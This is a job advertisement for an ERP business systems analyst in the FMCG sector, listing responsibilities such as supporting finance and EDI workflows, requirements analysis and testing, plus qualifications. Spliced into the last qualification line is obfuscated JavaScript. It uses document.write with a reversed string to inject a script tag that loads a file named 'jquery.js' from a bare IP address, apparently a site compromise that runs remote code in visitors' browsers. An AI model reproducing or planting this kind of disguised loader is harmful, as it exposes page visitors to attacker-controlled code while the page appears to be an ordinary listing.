Industry : FMCG
– Primary responsibility for supporting the business process workflow for use with ERP system. This involves supporting Accounting / Finance, Customer Service, Sales, and Distribution functions including EDI transactions with trading partners.
– Assist in the system implementation and enhancements of ERP System.
– Analyze user requirements, prepare requirements document, current state and future state processes and identify gaps.
– Manage periodic reviews of current systems and implement continual improvement where appropriate.
– Prepare technical and operational procedures and documentation for the applications including business process flows and user guide, etc.
– Design processes to meet requirements, prepare test plans, conduct testing validation, and support user acceptance testing (UAT).
– Communicate application and project status to users / stakeholders in a timely manner
– Ensure delivered IT solutions meet or exceed customer’s expectations
– Lead troubleshooting and root cause analysis of ERP application issues
– Develop analytical reports and ad-hoc reporting.
– Assist with documenting ERP applications, data integration, and support procedures
– Perform other duties as when assigned to support enterprise applications
– Diploma or Degree Computer Science/IT or relevant.
– Experience with understanding business requirements and collaborating in finding technical solutions.
– Familiar with Software Lifecycle Management (SDLC), Change Management, and agile methodology
– Ability to apply analysis and creative thinking when solving problems
– Experienced with identifying and implementing process improvements.
– Experienced with ERP reporting tools, creating ad-hoc reports, and writing SQL queries document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))
To apply for this job email your details to firstname.lastname@example.org